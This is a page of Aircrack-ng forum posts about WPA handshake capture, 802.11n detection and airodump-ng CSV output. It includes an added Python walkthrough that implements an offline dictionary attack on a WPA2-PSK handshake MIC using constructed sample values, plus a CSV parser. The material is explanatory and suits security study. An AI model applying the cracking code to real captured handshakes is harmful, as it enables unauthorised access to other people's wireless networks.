Aircrack-ng

 11 
 on: June 05, 2018, 12:04:53 PM 
Started by nomonater - Last post by misterx
Then you'll have to write your own program to output the fields you need.

 12 
 on: June 05, 2018, 03:22:33 AM 
Started by peterfarge - Last post by mstrmnn
So Aircrack needs only Eapol-1 (or Eapol-3) and Eapol-2.
Thanks for your explanation. I enjoyed reading!

 13 
 on: June 05, 2018, 01:51:11 AM 
Started by newb.hacker - Last post by newb.hacker
Thanks for the reply. Is there any way to confirm that the devices connected are on 802.11n/ac? And also, what is the meaning of AP (Access Point)? I tried Googling it but was unsuccessful. Pardon my mistakes, because I am a beginner.

 14 
 on: June 04, 2018, 07:48:50 PM 
Started by peterfarge - Last post by misterx
If you have aircrack-ng 1.2, it should be pretty obvious with rates that are different from the b/g rates 1, 2, 5.5, 11, 24, 36, 48, 54.

802.11b would be 1, 2, 5.5, 11 and 802.11g also supports 24, 36, 48, 54.

 15 
 on: June 04, 2018, 07:46:37 PM 
Started by peterfarge - Last post by misterx
Beacon is not needed, you would just have to provide essid when cracking. It is just more convenient.

 16 
 on: June 04, 2018, 07:06:13 PM 
Started by peterfarge - Last post by peterfarge
This page (aircrack-ng) says I need EAPOL packets 2+3 or 3+4 to do an attack.
This page (wpa_capture) says I need 1+2 or 3+4. (Packets with the same "replay counter" value are matching sets.)

To calculate the PTK (Pairwise Transient Key), I need:
1. ANonce: a random number from the AP, delivered in plain text within packets EAPOL-1 and EAPOL-3.
2. SNonce: a random number from the client, delivered in plain text within packet EAPOL-2.
3. MAC addresses of both client and AP. They are in every EAPOL packet.
4. And the passphrase (pre-shared key case).

Aircrack takes a passphrase from the password dictionary and calculates a PTK candidate. Then, with the PTK candidate, Aircrack calculates the Message Integrity Code (MIC) and compares it with the real MIC in EAPOL-2. If they match, the correct passphrase is found.

So Aircrack needs only EAPOL-1 (or EAPOL-3) and EAPOL-2. All needed info is in there. If I remove all packets from the .cap file except the combination (1+2 or 2+3), aircrack seems to work. Only I have to give the SSID as an extra parameter on the command line; I don't know where it is used in the cracking process. The EAPOL 4-way handshake does not need the SSID, if the explanations are right.

The combination EAPOL 3+4 does not work; I have checked it with aircrack.

And what does this mean: "Ensure this beacon is part of the same packet sequence numbers" (source: wpa_capture)? The beacon contains no important info. The sequence numbers consist of 12 bits, which means a reset every 4096 packets. If only the first beacon is inserted into the .cap file, the captured handshake could happen thousands of resets later.

I think in the manual some info about cracking the passphrase is mixed up with injection into the packet stream.
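The PTK derivation and MIC comparison described in the post above, as an added worked example in Python. This is not aircrack-ng's code and nothing here comes from a capture: the SSID, MAC addresses, nonces, passphrase and wordlist are all constructed in the block. It also shows where the SSID enters: PBKDF2 uses it as the salt when turning the passphrase into the PMK, which is why aircrack-ng needs it (from a beacon or via -e) even though the EAPOL frames themselves never carry it.

```python
import hashlib
import hmac
import struct

# Constructed sample values (NOT from a real capture); every byte below is made up
# here so the example runs offline.
SSID = b"TestNet"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))          # AP nonce: the same value appears in EAPOL msg 1 and msg 3
SNONCE = bytes(range(32, 64))      # client nonce: carried in EAPOL msg 2
TRUE_PASSPHRASE = b"correct horse"
WORDLIST = [b"password", b"12345678", b"correct horse", b"letmein1"]

MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC
MIC_LEN = 16


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the only step that uses the SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PRF-384 from IEEE 802.11i: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    Returns 48 bytes; the first 16 (the KCK) are what the MIC check needs."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(3):   # 3 x 20 bytes >= 48
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def build_eapol_msg2(snonce, replay_counter=1):
    """Minimal EAPOL-Key message 2 (RSN descriptor, key info 0x010a: descriptor version 2,
    pairwise, MIC bit set, zero-length key data) with the MIC field zeroed."""
    body = struct.pack(">BHHQ", 2, 0x010a, 16, replay_counter)   # descriptor type, key info, key length, replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)             # key nonce, key IV, key RSC, key ID
    body += bytes(MIC_LEN) + struct.pack(">H", 0)                # MIC placeholder, key data length
    return struct.pack(">BBH", 1, 3, len(body)) + body           # 802.1X version 1, type 3 = EAPOL-Key, length


def compute_mic(kck, eapol_frame):
    """MIC over the whole EAPOL frame with the MIC field zeroed. Descriptor version 1 (TKIP)
    uses HMAC-MD5, version 2 (CCMP) uses HMAC-SHA1, both truncated to 16 bytes."""
    version = struct.unpack(">H", eapol_frame[5:7])[0] & 0x7
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(MIC_LEN) + eapol_frame[MIC_OFFSET + MIC_LEN:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def make_sample_msg2():
    """Produce the constructed 'captured' message 2 by signing the frame with the true passphrase."""
    frame = build_eapol_msg2(SNONCE)
    kck = derive_ptk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    mic = compute_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]


def crack(wordlist, ssid, ap_mac, client_mac, anonce, eapol_msg2):
    """Per candidate: passphrase -> PMK -> PTK -> KCK -> MIC, compared with the MIC in
    message 2. Only ANonce (from msg 1 or 3), msg 2 and the two MACs are needed."""
    snonce = eapol_msg2[17:49]                                   # key nonce field of message 2
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(compute_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    msg2 = make_sample_msg2()
    print("found:", crack(WORDLIST, SSID, AP_MAC, CLIENT_MAC, ANONCE, msg2))
    print("wrong SSID:", crack(WORDLIST, b"OtherNet", AP_MAC, CLIENT_MAC, ANONCE, msg2))
```

Running the block recovers "correct horse" from the wordlist; running the same search with a wrong SSID finds nothing, because every PMK candidate is derived from a different salt. The 4096-iteration PBKDF2 per candidate is also why the SSID is worth knowing before cracking: a wrong one wastes the whole run.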

 17 
 on: June 04, 2018, 03:55:11 PM 
Started by peterfarge - Last post by peterfarge
I have updated my OpenWRT router from Barrier Breaker to Chaos Calmer. Instead of Band I have a combobox labeled Mode. I can switch between N and legacy. I'm guessing that legacy means 802.11 b/g/a, because then a bandwidth of 40 MHz isn't possible anymore. So now it's the other way around: I needed 6 tries switching WLAN on/off to catch the handshake with the built-in Intel adapter, but the Alfa AWUS036H catches the complete handshake on every second try. But the data packets problem stays: if I start airodump in the same second and open a webpage on my smartphone, the Alfa catches 376 data packets (306 beacons) and the built-in Intel card catches 1044 data packets (434 beacons).

Because of the data rate (MB column), I can see if it's an 802.11b or 802.11g network, but how can I see that it's an 802.11n network? I can't find any info in iwlist wlan1 scan either. How can I recognize an 802.11n network?

 18 
 on: June 04, 2018, 03:40:06 PM 
Started by nomonater - Last post by nomonater
> I assume you want to use the database feature to automatically import the CSV. It will not work because this CSV is a bit special. It has 2 parts: the APs at the beginning and the clients afterward and both of those have different set of columns. I would suggest creating a custom script to import it considering you also can't choose which columns are exported in the CSV.

That is why I asked this question. So there is no way to format the output CSV file from airodump-ng to only contain the clients and simply not save the access points? The reason I need this to be the case is that I am running out of threads to use, and a Python script or something running to create another file with only the client data is going to really slow the system down; I may flat out not have enough threads to do this, not to mention the extra space this uses on the SD card and the delay before that info enters the database.

 19 
 on: June 04, 2018, 03:26:30 PM 
Started by domelsnake - Last post by misterx
1. Yes. Just FYI, we have a repository and I believe Kali is using it.
2. It is working, but just bear in mind that it is still in development, beta pretty much, so depending on your "injection/capture" requirements, it might work.
3. Don't put a directional antenna on that card unless the antenna is designed for MIMO. Regarding omni, there isn't much point going over 5-7 dBi gain due to the radiation pattern.

NH is probably a better choice for now. Keep the ACH for experimenting, as explained in 2.

 20 
 on: June 04, 2018, 03:22:16 PM 
Started by nomonater - Last post by misterx
I assume you want to use the database feature to automatically import the CSV. It will not work because this CSV is a bit special. It has 2 parts: the APs at the beginning and the clients afterward and both of those have different set of columns. I would suggest creating a custom script to import it considering you also can't choose which columns are exported in the CSV.
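The two-section airodump-ng CSV described in this reply and in post 18 above, and the "custom script" suggested for it, as an added example in Python (not part of the aircrack-ng project or of either post). The sample file is constructed here; its column headers follow the layout airodump-ng writes (an AP section, a blank line, then a "Station MAC" section with its own columns), but check them against your own output before relying on names like "Probed ESSIDs". The script splits the file on the two header lines and writes out only the client rows, which is the part the database import needs.

```python
import csv
import io

# Constructed sample in the airodump-ng CSV layout (not a real capture). The AP section
# has 15 columns and the client ("Station") section has 7; the last column of each
# (Key, Probed ESSIDs) can itself contain commas, which is what breaks naive importers.
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2018-06-04 15:00:01, 2018-06-04 15:05:10,  6,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   7, TestNet, 
66:77:88:99:AA:BB, 2018-06-04 15:00:03, 2018-06-04 15:05:09, 11, 130, WPA2, CCMP, PSK, -61,       88,        0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2018-06-04 15:00:05, 2018-06-04 15:05:08, -45,      310, 00:11:22:33:44:55, TestNet
AA:BB:CC:DD:EE:02, 2018-06-04 15:01:12, 2018-06-04 15:04:59, -70,       12, (not associated), Guest,CoffeeShop

"""


def parse_airodump_csv(text):
    """Split an airodump-ng CSV into (aps, clients), each a list of dicts keyed by header name."""
    aps, clients = [], []
    section = None          # None until the first header line, then "ap" or "client"
    columns = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("BSSID,"):
            section, columns = "ap", [c.strip() for c in line.split(",")]
            continue
        if line.startswith("Station MAC,"):
            section, columns = "client", [c.strip() for c in line.split(",")]
            continue
        if section is None:
            continue
        # Split into at most len(columns) fields so commas inside the last column survive,
        # then pad short rows so every dict has every header.
        fields = [f.strip() for f in line.split(",", len(columns) - 1)]
        fields += [""] * (len(columns) - len(fields))
        (aps if section == "ap" else clients).append(dict(zip(columns, fields)))
    return aps, clients


def clients_only_csv(text):
    """Return just the client section as properly quoted CSV text, ready for import."""
    _, clients = parse_airodump_csv(text)
    if not clients:
        return ""
    columns = list(clients[0].keys())
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")   # quotes fields that contain commas
    writer.writerow(columns)
    for row in clients:
        writer.writerow([row[c] for c in columns])
    return buf.getvalue()


if __name__ == "__main__":
    print(clients_only_csv(SAMPLE_CSV))
```

Usage on a real file is `clients_only_csv(open("capture-01.csv").read())`, written to a second file that the database import reads. The work is a single pass over the text with no extra processes, which keeps the cost low on a thread-starved board; if even that is too much, the same split can be done once on the final CSV after airodump-ng stops rather than continuously.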
